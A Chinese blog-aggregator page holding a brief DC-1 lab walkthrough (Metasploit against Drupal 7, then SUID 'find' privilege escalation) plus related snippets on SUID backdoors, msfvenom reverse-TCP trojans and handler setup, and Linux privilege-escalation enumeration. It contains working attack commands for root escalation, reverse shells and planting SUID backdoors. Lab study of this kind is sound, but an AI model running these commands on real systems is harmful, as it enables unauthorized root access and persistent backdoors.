DC1(msf drupal7+suid-find提权)

这边我们靶机是仅主机模式,IP是192.168.56.101,,直接上msf拿到shell,  不过payload要改一下 改成php/meterperter/bind_tcp

拿到shell了 ,采用交互式

python -c "import pty;pty.spawn(‘/bin/bash‘)"
find / -type f -perm -u=s 2>/dev/null #find查看root
find /var/www -exec "/bin/sh" \; # find提权

原文地址:https://www.cnblogs.com/kuaile1314/p/12229986.html

时间: 2024-11-08 18:48:21

DC1(msf drupal7+suid-find提权)的相关文章

设置SUID用于提权或降权

一.基础介绍 刚看了马哥的视频介绍SUID说,当为可执行文件设置SUID并当其转换为进程后,该进程的所属主为原程序文件的属主,以原程序文件属主的身份进行操作,该特殊权限可以用于提权或降权.SUID典型的应用就是passwd命令,使用此命令普通用户也能以root的身份去读写shadow文件. 二.提权 使用SUID提权,准确的说应该是制作后门,当为cat.vim.nano甚至nmap设置SUID后,即可拥有root的权限,示例: 使用普通用户读取shadow文件 1.copy命令到/tmp下,用于

用MSF进行提权

在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe 然后在到MSF根据刚才配置的木马后门进行监听...

Linux SUID、SGID、sticky提权

对SUID只需要有个了解就行了,不要瞎设置,否则会影响系统的稳定运行 1.临时提权让不同的组之间可以相互查看别创建的文件[[email protected] ~]# chmod u+s /usr/bin/cat 注:把cat放到/usr/bin/才会运行[[email protected] ~]# ll /usr/bin/cat-rwsr-xr-x. 1 root root 54080 11月 6 2016 /usr/bin/cat[[email protected] ~]# 2.将赋予的SUI

soap注入某sql2008服务器结合msf进行提权

soap注入某sql2008服务器结合msf进行提权 simeon 在实际成功×××过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次×××利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限.本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行ms16-075成功提权的一个经典案例. 1.1.1扫描soap注入漏洞 1.使用awvs中的web services scann

Linux提权-suid提权

0x1 suid概念 通俗理解为其他用户执行这个程序是可以用该程序所有者/组的权限 0x2 suid提权 简单理解为,一个文件有s标志(权限中包含s),并且对应的是root权限,那么当运行这个程序时就有root权限,且这个程序还能执行命令.此时就能从普通用户提升到root权限了. 0x3 常见可用suid提权的命令 0x4 查找特权文件命令 具体来说,这些命令将尝试查找具有root权限的SUID的文件 find / -user root -perm -4000 -print 2>/dev/nul

【渗透测试】Msf提权步骤

1.生成反弹木马(脚本,执行程序) msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe 2.MSF接受设置 1 use exploit/multi/handler 2 set payload windows/meterpreter/reverse_tcp 3 set LHOST 192.168.1

MSF查找提权exp

0x01:介绍 在拿到一个反弹shell后,下一步可以用metaspolit的内置模块Local Exploit SuggesterLocal-exploit-suggester的功能就如它的名字一样,当我们用它来探测某一个系统时,他会告诉我们该系统有哪些exploit可能可以利用.但是由于该工具先是假设一个系统存在所有的相关漏洞,然后根据补丁信息再去排除,所以就导致误报率会高一点,例如一台机器没有启用iis服务,但是可能该工具会误报存在IIS相关漏洞. 0x02:使用 usepost/mult

Linux 提权常用命令集

转载:http://www.myhack58.com/Article/html/3/8/2017/83236.htm 0x00 操作系统相关 操作系统类型版本 cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian cat /etc/redhat-release # Redhat 内核版本,是否是64位 cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | g

RHEL给某低级用户【提权】或者【攻击】

一.提权 root下 cp /usr/bin/ksh /某目录/a.sh chmod +s /某目录/a.sh 低级用户: 打开/某目录/a.sh 得到高权限 二.攻击(查找有特权的文件) #find /home –type f\f(-perm -4000 –o –perm -2000\) -ls #find /home -type f \( -perm -04000 -o -perm -02000 \) -exec ls -l {} \; 这告诉find列出所有设置了SUID("4000&qu